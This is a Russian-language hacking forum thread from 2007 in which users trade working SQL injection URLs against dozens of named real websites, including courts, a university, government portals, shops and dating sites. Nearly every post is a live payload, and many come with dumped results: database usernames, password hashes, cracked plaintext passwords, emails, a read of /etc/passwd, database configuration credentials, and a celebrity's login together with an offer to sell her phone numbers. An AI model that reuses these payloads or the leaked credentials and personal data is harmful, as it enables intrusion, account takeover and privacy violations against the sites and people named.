Просмотр полной версии : SQL Инъекции
limpompo
19.04.2007, 16:37
To V.I.P
root: 3616438873d71bd2
ivax: 652fa1a75d18da89
wx: 68708852333c8a5e
pp: 1b112489580fbed1
air: 2a98610a18cbfe30
Поставил на расшифровку получил:
ivax:652fa1a75d18da89 - blaX
air:2a98610a18cbfe30 - agFa41
Продолжение Следует....
Краснодарсикй краевой суд
Таблицы: users
Поле ток 1 нашел: password :)
http://webwork.agora-soft.ru/p.php?CATEGORY=-4+union+select+concat_ws(char(58),version(),user() ,database())+from+users/*
//Что-то меня по судам тянет =)
И вот ещё одна:
MTC - мож комута удастся выташить базу.
http://www.recom.ru/mts/abonents/news/read/?id=-412+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(versi on(),0x73),0x73),4,5,6,7,8,9,10/*
_Pantera_
19.04.2007, 18:31
http://encycl.anthropology.ru/article.php?id=-3+union+select+1,concat(id,char(58),name,char(58), lastname),3,4,5,6,7,8,9,10+from+person+limit+0,1/*
http://www.oborudunion.ru/publications_st.php?id=1+and+1=-2+union+select+1,2,version(),4,id,6,7+from+ou_publ ications_st/*
http://www.indeks.ru/service.htm?id=-5+union+select+1,version(),3,4/*
натариусы Москвы
http://www.mosdoma.ru/static_inf.php?id=-1+union+select+1,concat(user,char(58),password),3, 4,5,6+from+mysql.user+limit+0,1/*
nwags.ru
Сайт одного из питерских универов (точнее, сайт "академии при президенте РФ")
http://www.nwags.ru/index.phtml?id_page=11&id=-1+union+select+1,2,concat(username,0x3a,user_passw ord),4,5,6,7,8,9,10,11,12,13+from+acad_phpbb_users +limit+1,1/*
admin:bbb8aae57c104cda40c93843ad5e6db8
там 5я версия, кому интересно, можете посмотреть остальные таблицы) acad_users вроде есть.
www.clubpoker.net
http://www.clubpoker.net/showpage/?id=-67+union+select+1,2,3,concat(username,0x3a,user_pa ssword,0x3a,version()),5+from+users+limit+2,1/*
http://www.clubpoker.net/showpage/?id=-67+UNION+SELECT+1,2,3,table_name,5+from+INFORMATIO N_SCHEMA.TABLES+limit+41,1/*
n1†R0x,
md5 - bbb8aae57c104cda40c93843ad5e6db8
pass - 111111111
www.incom-shina.ru
Покупаем шины
http://www.incom-shina.ru/catalog.php?model_id=-357%20union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15/*
[53x]Shadow
20.04.2007, 03:52
BIBIKA
Вот мой первый скуль, толька кол-во столбцов подобрать не удалось((
http://www.bibika.ru/list.php?id=14380586+and+u ser()%3C%3E1
www.incom-shina.ru
Покупаем шины
http://www.incom-shina.ru/catalog.php?model_id=-357%20union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15/*
Вот
http://www.incom-shina.ru/catalog.php?model_id=-357+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, concat(user,char(58),password)+from+mysql.user/*
root:31145a7a1dc8740d
Международное брачное агентство «Союз двух сердец»
http://www.heartsunion.com/vopr-otv/index.php?id=-8+union+select+1,2,3,version(),4+from+news/*
Вытенул только news
VampiRUS
20.04.2007, 06:54
root@localhost
http://www.itotal.ru/site.phtml?id=22601+union+select+1,2,3,AES_DECRYPT (AES_ENCRYPT(load_file(0x2F686F6D652F69746F74616C2 E72752F7777772F61646D696E2F6E616D652E706870),0x73) ,0x73),5,6,7,8,9,0,1/*
Joker-jar
20.04.2007, 15:31
http://olympus.ru/about/news/2006/01/31/-1+union+select+1,2,3,4,5,6,version()--
limpompo
20.04.2007, 16:19
To V.I.P
http://www.incom-shina.ru/catalog.php?model_id=-357+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, concat(user,char(58),password)+from+mysql.user/*
root:31145a7a1dc8740d - Расшифрованно и пасс: 518EA
http://www.diel.com.ua/folio/works.php?id=-48/**/union/**/select/**/1,2,3,4,5,6,AES_DECRYPT(AES_ENCRYPT(concat(databas e(),0x3a,version(),0x3a,user()),0x73),0x73),8,9,10/*#
medtorg.ru
http://www.medtorg.ru/podraz.php?id_num=-18+union+select+null,version(),null,null
www.dentland.com.ua
http://www.dentland.com.ua/katFul.php?_ID=-14+union+select+1,2,concat(version(),char(58),user (),char(58),database()),4,5,6,7/*
karelinform.ru
http://karelinform.ru/?id=-7488+union+select+1,2,3,4,5,6,AES_DECRYPT(AES_ENCR YPT(version(),0x73),0x73),8,9/*
www.domkino.spb.ru-Кто-то выкладывал,но ч разрачил :)
http://www.domkino.spb.ru/description.php?id=-258+union+select+1,2,concat(name,char(58),login,ch ar(58),password,char(58),email),4,5,6,7,8,9,0,1,2, 3,4,5,6,7+from+user/*
Выцепляем лимитом.(+limit+4,1)
Имя:логин:ПаСС:Mail
Шурик:shurik:ahin:sshurik@online.ru
Андрей:andrey:andrey:nag@parnas.spb.ru
Sergh:ss:ss:sergh@finec.ru
Джек-потрошитель:jack:jack:jack@mail.ru
http://www.kinomaniac.ru/movie.php?id=1151'+union+select+1,2/*
И ещё вапрос: Можно ли имея пасс shoop`а(магазина) заказать что небудь на-хал@ву?
»Atom1c«
20.04.2007, 22:05
www.nregion.com
user - nregion@localhost
database - wwwnregioncom
version - 4.1.18
http://www.nregion.com/txt.php?i=-1+union+select+1,2,3,4,5,6,7,8,9/*
offtop:
Пожалуйста юзайте Антибоян для темы "SQL иньекции"
Created by Constantine!
http://hlamidnik.h18.ru/SQLS.html
Сам уже забаянил =(
Кто идет на выставку Interop?
http://www.interop.ru/?page=newsview&id=-175%20union+select+1,1,1,1,1,1,1,1,1,1,1/*&offset=0&language=rus
http://thelist.ru/catalog.php?group=4&razdel=-1+union+select+table_name+from+information_schema. tables+limit+14,6/*
Кто идет на выставку Interop?
http://www.interop.ru/?page=newsview&id=-175%20union+select+1,1,1,1,1,1,1,1,1,1,1/*&offset=0&language=rus
Спешу на работу но если потрудиться можно фсё вытащить!
http://www.interop.ru/?page=newsview&id=-175%20union+select+1,2,3,4,5,6,7,1,9,concat(name,c har(58)),1+from+users+limit+0,1/*&offset=0&language=rus
MegaDeth
20.04.2007, 23:53
http://www.aidan-gallery.ru/cgi/wgal.cgi?gid=2708 UNION SELECT 1,2,3,4,5,6,7,8,9,10,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/*
так и не подобрал. скока же их там.. до ЖОПЫ.
limpompo
21.04.2007, 03:13
www.nregion.com
user - nregion@localhost
database - wwwnregioncom
version - 4.1.18
=== Добавление От меня ===
Найдены таблицы:
person
mysql.user
forums
news
guestbook
messages
Constantine
21.04.2007, 09:42
>>так и не подобрал. скока же их там.. до ЖОПЫ.
вообще то боян
MegaDeth
21.04.2007, 11:28
>>так и не подобрал. скока же их там.. до ЖОПЫ.
вообще то боян
млин, сорри.. юзал антибаян, правд... поставте мне минус :D
www.on-air.mn
http://www.on-air.mn/www/index.php?action=blog.home&blog_id=-6+union+select+1,2,concat(version(),char(58),user( )),4,5,6/*
http://www.forumworld.info/index.php?act=Arcade&do=stats&gameid='
http://www.forumworld.info/arcade.php?search_type=0&gsearch='
http://www.hazart.ru/index.php?id=-1+union+select+1,version(),3,4,5,6,1,2/*
»Atom1c«
21.04.2007, 17:28
www.mapryal.org
http://www.mapryal.org/activities/showactivity.phtml?id=-1+union+select+1,USER(),VERSION(),4,5,6,7,8,9,10,1 1,DATABASE(),13,14,15,16,17/*
InferNo23
21.04.2007, 17:31
a1tv - Первый Альтернативный Телеканал.
http://a1tv.ru/AOpenCons.php?ID=-1+union+select+1,2,icq,4,5,concat(membername,0x3a, passwd,0x3a,passwordsalt),7,8+from+smf_members+lim it+0,1/*
11000 юзеров
nick:pass:salt
[53x]Shadow
21.04.2007, 18:51
alumni.mgimo.ru - ассоциация выпускников МГИМО!!!
Гламурные падонки;)
http://alumni.mgimo.ru/inner/modules/gallery/gallery.php?act=sho w_gallery&id=123+uni on+select+passwor d+from+mysql.user+limit+0, 1/*
Доступ к mysql:
admin: alumnihse
pass: 0e420e231935eccd
Да кстати аккаунт Ксении Собчак ;)
login: ksun
pass: jcrfh (что по русски - оскар) Мну долго смеялся :D :D :D
Constantine
21.04.2007, 20:37
http://www.kasseinitiatives.com/Login.php?id=-12+union+select+1,2,concat(user(),char(58),version (),char(58),database()),4,5/*
Digimortal
22.04.2007, 01:36
http://www.wincleaner.com/products/details.php?uid=-2%20UNION%20SELECT%201,2,3,4,5,6,LOAD_FILE(0x2F657 4632F706173737764),8,9,10,11,12,13,14,15,16,17,18, 19,20,version(),22/*
http://www.wincleaner.com/products/details.php?uid=-2%20UNION%20SELECT%201,2,3,password,5,6,username,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+use rs
http://www.wincleaner.com/products/details.php?uid=-2%20UNION%20SELECT%201,2,3,4,5,6,name,8,9,10,11,12 ,13,14,15,16,17,18,19,20,price,22+from+products
atmospheriques.com
http://www.atmospheriques.com/artiste.php?id=-1+union+select+1,2,concat(login,0x3a,pass),4,5,6,7 ,8+from+admin/*
obogrev.ru
http://www.obogrev.ru/page.php?id=-1+union+select+1,2,3/*
gfbv.de
http://www.gfbv.de/report.php?id=-1+or+1=version()--
п.с. аааа i need slip
[53x]Shadow
22.04.2007, 03:11
Shadow']alumni.mgimo.ru - ассоциация выпускников МГИМО!!!
Гламурные падонки;)
http://alumni.mgimo.ru/inner/modules/gallery/gallery.php?act=sho w_gallery&id=123+uni on+select+passwor d+from+mysql.user+limit+0, 1/*
Доступ к mysql:
admin: alumnihse
pass: 0e420e231935eccd
Да кстати аккаунт Ксении Собчак ;)
login: ksun
pass: jcrfh (что по русски - оскар) Мну долго смеялся :D :D :D
Дом2 отдыхает!!!(немнооого пьян;)) :D :D :D :D
Могу подкинуть её дом. телефон и моб. телефон, а так же почту на яндекс с пассом!!! Есествено за вмз, ;) Для ачатовцев бизплатно!!! :D :D :D
Кто ламонет акк админа к Mysql тому фотки мега секси ксюши в душе!!!(гонево априорно;), сорри за флуд)
}{0TT@БЬ)Ч
22.04.2007, 03:21
http://www.autobazar.od.ua/katalog.php?id=1&brands=-70+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(versio n(),0x71),0x71),4,5/*вроде в антибояне нету
http://www.lorgg.org/index.php?p=gal_werk&wID=-1+union+select+1,2,3,4,version(),6
http://www.flirtanica.ru/articles1.php?id=-24+union+select+1,version(),3,4,5/*
http://love.shimkent.info/screen.php?id=127'+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
http://date.inter.by/anketa.php?id='+union+select+1,2,3,4,concat(name,c har(58),sex,char(58),icq),6,7,8,9,10,1,2,3,4,5,6,7 ,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10, 1,2,3,4,5,6,7,8,9,10+from+users+limit+22,1/*
http://www.rocit.ru/news/shownews.php3?id=-14192+union+select+1,2,3,4,version(),6,7,8,9,10/*
http://www.popgurls.com/article_show.php3?id=-546+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,version()/*
http://www.cageprisoners.com/page.php?id=-3+union+select+1,password,username+from+admins+lim it+8,1/*
aдминка-http://www.cageprisoners.com/admin/login.php?accessdenied=%2Fadmin%2F
http://www.mcbooks.com/bookstore/product_details.php?id=-229+order+by+73/*
Если что бояном не бейте :)
http://www.flirtanica.ru
http://www.rocit.ru
http://www.popgurls.com
было! Юзай гугл!
KPOT_f!nd
22.04.2007, 15:12
http://www.dancenter.ru/articals.php?id=-21+union+select+concat(user(),char(58),version(),c har(58),database(),char(58)),2,3,4/*
VampiRUS
22.04.2007, 15:52
http://www.topmobila.com.ua/t.php?id=-1+union+select+1,2,3,4,USER(),6,7,8,9,0,1,2,3,4,5, 6,7+admins/*
ни админки ни полей ненашёл(да и не искал :) сильно)
Constantine
22.04.2007, 16:18
Создание антибояна завершена.
Все скули проверяем.
Обновление будет проводиться раз в неделю
http://hlamidnik.h18.ru/SQLS.html
http://0629.com.ua/doska.php?id_cat=-1'
Скуль. Весь сайт построен на инклудах. так что слить не проблема. Кто догадается!!
www.suunnistus.net
http://www.suunnistus.net/remote/puhaih/index.php?Id=-378+union+select+1,2,3,concat(user(),char(58),vers ion()),5,6,7,8,9,10/*
KPOT_f!nd
22.04.2007, 20:43
http://www.vivactiv.ru/trainings/trainers.php?id=-4+union+select+concat(id,char(58),pass),2,email+fr om+users/*
понеслась!!!
www.mysql-hispano.org/page.php?id=43'
http://www.mundanesounds.com/feature.php?id=1458 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14
http://www.rarefish.be/storing/feature.php?id=49 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22
http://www.rli.ie/news/feature.php?Id=0003 and 1=0 union select 1,2,3,4,5,6
http://soundsect.com/feature.php?id=4%20and%201=0%20union%20select%201, 2,3,4,5,6,7,8,9
http://www.bifa.org.uk/feature.php?id=1+union+select+1,2,3,4,5,6,7
http://www.dpblue.com/resources-divespots-results.asp?id=5%20union%20select%201,email,passwo rd,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25%20from%20users
http://www.lduk.co.uk/results.php?id=60%20and%201=0%20union%20select%201 ,password,3%20from%20users/*
http://www.mx-5cup.com/event/results.php?ID=255+and+1=0+union+select+1,2,id,4,p assword,6,7,8,9,10%20from%20users
http://www.drapaccycling.com/results.php?id=25%20and%201=0%20union%20select%201 ,email,password,4,5,6,7,8,9,10,11,12,13,14,15%20fr om%20users
big_BRAT
23.04.2007, 14:57
http://www.odyssey.od.ua/show.php?cat=audio&id=-470+union+select+1,2,concat_ws(char(58),version(), user()),4,concat_ws(char(58),user,password)+from+m ysql.user/*
http://www.odyssey.od.ua/show.php?cat=audio&id=-470+union+select+1,2,load_file(0x2f6574632f7061737 37764),4,concat_ws(char(58),user,password)+from+my sql.user/*
===> /etc/passwd
http://www.odyssey.od.ua/show.php?cat=audio&id=-470+union+select+1,2,load_file(0x2f7573722f6c6f636 16c2f7777772f7777772e6f6479737365792e6f642e75612f7 3686f772e706870),4,concat_ws(char(58),user,passwor d)+from+mysql.user/*
===>
$db_login = "root";
$db_password = "jhondoe";
$db_name = "odyssey";
$db_host = "localhost";
===================================
звиняйте :(, уважаю ваш труд, впреть буду внимательней!!!!
Constantine
23.04.2007, 15:07
Просто отлично биг брат, 3 постами выше ссылка на лист сделаных скулей, а ты постишь БОЯН, ей богу бы - поставил =\
http://www.emets.ru/model.php?id='+union+select+1,version(),3,4,5,6,7, 8,9,10,11,12,13, 14/*
Проверенно антибаяном.
http://www.marketingsherpa.com/article.php?ident=-1+union+select+1,2,3,4,5,concat(user,0x3a,password ),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40 ,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,5 7,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73, 74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90 ,91,92,93,94,95,96,97,98,99,100,101,102,103,104,10 5,106,107,108,109,110,111,112,113,114,115,116,117, 118,119,120,121,122,123,124+from+mysql.user/*#
admin:6a866df47eaec74a
http://www.divaninfo.ru/base.php?tip=3&id=-66+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17/*
www.ulyanovsk.org
http://www.ulyanovsk.org/list/see.php?me_id=-133+union+select+1,user(),3,version(),database(),6 ,7,8,9/*
guest3297
24.04.2007, 19:04
АНТИБОЯН (http://hack-shop.org.ru/sql.php)
http://www.spirit.rasu.ru/ecatalog.php?id=765-1&org=-1+union+select+concat(login,0x3a,password)+from+us ers/*&irazd=1
http://www.equisport.ru/article.php?id_article=-1+union+select+concat(login,0x3a,password),2,3+fro m+users/*&id_page=2
http://www.equisport.ru/admin
кривая админка без авторизации.
http://traildevils.ch/markt.php?func=showSpecs&id=-1+union+select+1,user(),database(),4,version(),6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
}{0TT@БЬ)Ч
25.04.2007, 00:17
http://www.markkonka.com/newhomes/models.php?id=-1+union+select+1,2,3,database(),5,6,7,8,9,10,11,12 ,13,14,15/*
http://www.inuitcircumpolar.com/index.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,USER(),13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35,36/*&Lang=En
http://kompas.ascon.ru/products/index.php?id=1111111111+union+select+1,2,USER(),VE RSION(),5/*
)
Constantine
25.04.2007, 15:52
p-range. Удружи, щелкни по кнопочке Антибоян у меня в подписи или на ту красненькую которую кэш поставил и проверь свой пост =\
З.Ы пипец =(
Моя первая:
http://ehs.informatik.uni-oldenburg.de/de/news/fullview.php?id=-1+union+select+1,2,3,4,5,6/*
p.s.огромное спасибо Grey'ю за помощь.(помог разобраться в sql injection)
icewarn.com.au
http://www.icewarm.com.au/page.php?pId=-1+union+select+1,2,3,4,5,6,7,8,9,concat(user,0x3a, password)+from+mysql.user/*
root:*70FF28D5F25133E8ED4E2799113E9C6AD38526EA
зы: превед айсегу =\
Что-то давненько я тут не постил :)
http://www.pirateship.com.cn/article.php?id=-254%20union%20select%201,AES_DECRYPT(AES_ENCRYPT(c oncat(user,char(58),password),0),0),3,4,5,6,7,8,9% 20from%20mysql.user/*
http://www.hitchedmag.com/article.php?id=-18%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32,33,34,35,36,37,38,39,40,41,42,43,44/*
http://www.nwce.gov.uk/view_event.php?id=-60%20union%20select%201,user(),3,4,5,6,7,8,9,0,11, 12,13,14,15,16,17,18,19/*
http://www.monitor-nhsft.gov.uk/publications.php?id=-952%20union%20select%201,user(),3,4,5,6,7,8,9,0,11 ,12,13,14,15,16,17,18,19/*
__:)__
http://www.guaira.pr.gov.br/php/noticia.php?id=-626+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(con cat(version()),0x73),0x73),5,6,7,8,9,0,1,2 ,3,4,5,6,7,8+from+ssp2g_admins/*
http://romadan.bdk.com.ru/br.php?ID=-42+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(versio n(),0x73),0x73),4 ,5,6/*
http://www.legalizar.com.br/php/pg-arquivo-noticias.php?id=-35+union+select+1,2,3,4,version(),6,7 ,8/*
http://www.math.uqam.ca/page-cc.php?id=-56+union+select+1,version(),3,4,5,6,7,8,9, 10/*
Woldemar
26.04.2007, 09:37
http://www.aikyn.kz/print.php?lan=kaz&id=166&pub='
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in d:\web\aikyn.kz\mod\pub.www.mod.php on line 87
Винда походу кто что дальше копаемс 8-)
http://old.aids.lt/dynpage.ru.php?id=-1+union+select+1,2,3,concat(user,char(58),password ),5+from+mysql. user/*
root:6f7e3ea03b3097d2
httpd:3313fabe7895922b
squirreluser:724e1684141f4a63
limpompo
26.04.2007, 13:00
To V.I.P
root:6f7e3ea03b3097d2
httpd:3313fabe7895922b
squirreluser:724e1684141f4a63
После расшифровки получил:
root - ro2ot
httpd - ht3876
blackybr
26.04.2007, 14:44
_http://www.euroweb.ru/webnews/?id=-1+union+select+1,2,3,4,5,6+from+admins/*
задолбался подбирать что еще... сломал через другой соседний сайт..
http://www.dirpodcast.com/podcasts/index.php?iid=9596+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13,concat(email,0x3a,password),15,16,17,1 8,19,20,21,22,23+from+users+Limit+50
http://www.methings.com/podcasts/index.php?iid=13581+union+select+1,version(),3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
http://www.cuenca.gov.ec/contenido.php?id=-28+union+select+1,2,3,4,convert(concat(name,0x3a,p assword,0x3a,email)+using+latin1),6,7+from+user/*
http://www.burdur.gov.tr/haberoku.php?idd=123456789+union+select+1,concat(a dmin_no,0x3a,admin_adi,0x3a,admin_sifre),3,4,5,6+f rom+admin/*
кто админку найдет - пишите :)
www.gramota.ru
Скажем да медведу ?
http://www.gramota.ru/news.html?nn=-1+union+select+1,concat(user(),0x3a,version()),3,4 ,5,6+from+user/*
С колонками трабла, хотя не особо и старался.
big_BRAT
26.04.2007, 23:11
думал сначала написать это сообщение в раздел "просьба о взломах", но имхо это слишком)))
может кто-то сможет помочь с этим сайтом _http://www.1plus1city.tv/star/?p=-9999, оч. нужно
думал сначала написать это сообщение в раздел "просьба о взломах", но имхо это слишком)))
может кто-то сможет помочь с этим сайтом _http://www.1plus1city.tv/star/?p=-9999, оч. нужно
Где ты здесь инъекцию нашёл? =\
big_BRAT
27.04.2007, 06:36
ну впринцепе я для этого здесь и писал, что-б помогли определится, ну, нет, так нет
Премьер-министр Официальный сайт
http://www.premier-ministr.ru/index.php?module=news&id=-1+union+select+1,2,3,4,5,6,7,8,9,0/*
там стоит phpbb2, но название таблиц подобрать не смог.. кто осилит - с меня плюс)
видимо, там префикс какой-то жуткий, я ни одной таблицы не подобрал.
ачатовцы
http://www.achat.ru/forum/index.php?act=module&module=gallery&cmd=si&img=27+union+select+1,2,3,4,5,6/*
Может боян, но всё же:
WinRAR
http://www.win-rar.com/index.php?id=295&kb_article_id=-49+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat (user,0x3a,password),0x73),0x73),4,5,6,7,8,9,10+fr om+mysql.user
KPOT_f!nd
28.04.2007, 09:14
http://www.medell.ru/view.php?ID=-116+union+select+1,2,user(),4,5,6,concat(version() ,char(58),database()),8,9,10,11,12,13/*
табоицы не нашел(не пытался)
limpompo
28.04.2007, 12:27
http://www.medell.ru/view.php?ID=-116+union+select+1,2,user(),4,5,6,concat(version() ,char(58),database()),8,9,10,11,12,13/*
табоицы не нашел(не пытался)
Данные таблицы есть =)
information_schema.tables
information_schema.columns
Директория Сайта:
/home/medell/public_html
p.s пошёл вытаскивать table_name + column_name
=========== tables ===========
CatPro
Categories
Goods
GoodsList
Kats
Links
Mods
OrderedCarts
Orders
anons
kurs
news_tbl
qwery_tab
================
http://www.socreklama.ru/sr_advactions.php?adac_id=654+union+select+1,versi on(),3,4,5,6,7,8,9,10, 11,12,13,14--
алахакбаровский язык.)
http://www.212cafe.com/freewebboard/view.php?user=market&id='+union+select+1,2,3,4,5,6,7,8,9,10,AES_DECRYPT (AES_ENCRYPT(version(),0x73),0x73),12,13,14,15, 16,17,18,19,20/*
http://www.openradiohk.com/prog.php?id='+union+select+AES_DECRYPT(AES_ENCRYPT (version(),0x73),0x73),2,3, 4,5,6,7,8,9,10/*
http://contaxg.com/user.php?id=-4661%20union%20select%201,2,3,4,5,6,version(),8,9, 0,11%20from%20users/*
Constantine
28.04.2007, 15:43
Alexsize постим только раскрученные скули, предварительно проверенные на антибояне
Металинк Фитнес Менеджер:
http://fitnessmanager.ru/index.php?page=catalog&action=position_list&id=-96+union+select+1,concat(version(),0x3a,user(),0x3 a,database()),3,4,5,6,7,8,9,10/*
---------------------------
Федерация Компьютерного спорта России (Петербургское отделение)
http://fcsspb.ru/index.php?cont=content&id=6'+AND+1=0+union+select+1,2,concat(version(),0x 3a,user(),0x3a,database()),4,5,6,7,8,9,10,11,12,13/*
http://www.nerdtests.com/pics.php?id=-64+union+select+1,2,3,concat_ws(char(5 8),user,password),5,6,7+from+mysql.user+limit+6,1--
VampiRUS
29.04.2007, 08:08
http://www.ahfx.net/weblog.php?article=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(table_nam e,0x71),0x71),3,4,5,6,7,8,9,0,1,2,3,4+from+informa tion_schema.tables+limit+18,1/*
KPOT_f!nd
29.04.2007, 14:13
http://www.ontario-tut.ru/prihoj_big.php?id=-8+union+select+1,2,user(),concat(database(),char(5 8),version()),5,6,7,8,9,10,11,12,13/*
http://ww.trizway.com/show.php?id=-41+union+select+1,email,3,4,5,6,7,8,9,10,11,12,13, 14,15+from+subscriber/*&pg=2
author
news
Серенький
29.04.2007, 19:27
Сайт: http://www.botans.ru
уязвимость: http://www.botans.ru/study.php?groupid=2'
подобранные таблицы: users
подобранные поля: username,pass,email,id
193 организмa
http://www.botans.ru/study.php?groupid=-2+union+select+1,2,3,4,5,concat_ws(0x3a,id,usernam e,pass,email)+from+users/*
Серенький
29.04.2007, 20:09
Forcer
Металинк Фитнес Менеджер:
нашел users : login,password,email,id
marina:ce5225d01c39d2567bc229501d9e610d (pass:marina)
http://fitnessmanager.ru/index.php?page=catalog&action=position_list&id=-96+union+select+1,2,3,4,5,concat_ws(0x3a,id,login, password,email),7,8,9,10+from+users+limit+1,1/*
но практической пользы никакой - есть админка (http://fitnessmanager.ru/admin), но там другие данные.
http://zvisti.com.ua/info.php?id=-421%20UNION%20SELECT%201,2,3,4,5,table_name,7,8,9, 10,11,12+from+INFORMATION_SCHEMA.TABLES+limit+15,1/*
http://sodruzestvo.com/news/news.php?nid=-3+union+select+1,user(),3/*
=\
бильярдец)
propool.ru
http://www.propool.ru/news.php?id=-1+union+select+1,2,3,4,concat(username,0x3a,user_p assword),6,7,8,9,10,11+from+bb_users+limit+1,1/*
Vladimir:9497a5313079f955e60747fed4639ae6:piraxy
админка защищена .htaccess'ом... =\
Вот решил Эстонию пощупать :
www.leisivald.ee
http://www.leisivald.ee/index.php?b=-45+union+select+concat(login,char(58),password),2+ from+users/*
aina:462b87e9b978289beae59ff7ed7f4799
kaius:c2ea7f63c808abc0cf77b59226f3775b
-=lebed=-
30.04.2007, 10:11
Help sql-inj: www.autoteatr.ru
http://www.autoteatr.ru/catalog.php?subid=114
http://www.autoteatr.ru/catalog.php?subid=115-1
http://www.autoteatr.ru/catalog.php?subid=114'
Дошёл до 40 колонок (скока же их там?) - не получается составить правильный запрос к БД.
InferNo23
30.04.2007, 10:22
http://www.autoteatr.ru/catalog.php?subid=-1+union+select+concat(convert(username+using+cp125 1),0x3a,convert(user_password+using+cp1251))+from+ phpbb_users+limit+1,2/*
Mixa:runner
-=lebed=-
30.04.2007, 10:48
http://www.alexavto.ru/catalog.php?id=-123+union+select+1,version(),3,4,5,user(),7,8,9,10 ,11,12,13/*
Серенький
30.04.2007, 12:32
lebed
нашел там news,products,user_list
http://www.alexavto.ru/catalog.php?id=-3783+union+select+1,2,3,4,5,concat_ws(0x3a,user_id ,login,pwd,email,admin),7,8,9,0,1,2,3+from+user_li st+limit+0,1/*
-=lebed=-
30.04.2007, 13:10
Обход фильтрации через AES_DECRYPT(AES_ENCRYPT())
_http://hcc.cc.gatech.edu/taxonomy/cat.php?cat=-111+union+select+version()/* - так облом, а вот так:
_http://hcc.cc.gatech.edu/taxonomy/cat.php?cat=-111+union+select+AES_DECRYPT(AES_ENCRYPT(version() ,0x71),0x71)/* - нет облома ;)
Обход фильтрации через AES_DECRYPT(AES_ENCRYPT())
_http://hcc.cc.gatech.edu/taxonomy/cat.php?cat=-111+union+select+version()/* - так облом, а вот так:
_http://hcc.cc.gatech.edu/taxonomy/cat.php?cat=-111+union+select+AES_DECRYPT(AES_ENCRYPT(version() ,0x71),0x71)/* - нет облома ;)
какая еще фильтрация? :D просто кодировки не сочетаются.
Query failed: Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
нужно просто convert(version()+using+latin1)/*
http://hcc.cc.gatech.edu/taxonomy/cat.php?cat=-111+union+select+convert(version()+using+latin1)/*
//с кем не бывает.. :)
_Pantera_
30.04.2007, 13:40
http://www.usue.ru/general/professors/?id=-1+union+select+1,2,user_icq,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,concat(username,char(58),user_passwo rd)+from+www.phpbb_users+limit+1,1/*
slava:a6ad04d2d6f6d7cf072f27e46be45326
Всего зарегистрированных пользователей: 1368
http://news.ntv.ru/news/NewsPrint.jsp?nid=102499+order+by+56--
если кто дальше продолбит скиньте сюда или в личку плиз )
Серенький
30.04.2007, 19:03
КВН - 1я украинская лига
Сайт: http://kvn.odessa.ua
уязвимость: http://kvn.odessa.ua/gallery.php?action=view&cat=11'
подобранные таблицы: userlist
подобранные поля: name,pass
2 организмa (админы сайта)
endorfine:6bdd7328ba8d625d540a4203311f5ec5
dimon:77963b7a931377ad4ab5ad6a9cd718aa:ddd
http://kvn.odessa.ua/gallery.php?action=view&cat=-11+union+select+1,aes_decrypt(aes_encrypt(concat_w s(0x3a,name,pass),0x55),0x55),3,4,5+from+userlist/*
админка : http://kvn.odessa.ua/admin.php
http://www.logo.artperm.ru/script.php?litera=4'
В скуле не силён : )
}{0TT@БЬ)Ч
30.04.2007, 20:13
http://www.logo.artperm.ru/script.php?litera=4'
В скуле не силён : )
дальше сам уже ;) http://www.logo.artperm.ru/script.php?litera=4'+union+select+1,2,version(),4, 5,6,7,8/*
Серенький
30.04.2007, 20:41
Информационное агенство
Сайт: http://www.7info.ru
уязвимость: http://www.7info.ru/index.php?ns=127&id=61'
подобранные таблицы: user
подобранные поля: login,password,name
12 организмов
Admin:b842f0802c987156629ea4c87cca1259http://www.7info.ru/index.php?ns=127&id=-61+union+select+1,concat_ws(0x3a,login,password,na me)+from+user/*Админку не обнаружил.
}{0TT@БЬ)Ч
30.04.2007, 20:43
2Серенький
http://www.7info.ru/robots.txtхмм.... но дустопа нету
Максимум на что меня хватило :(
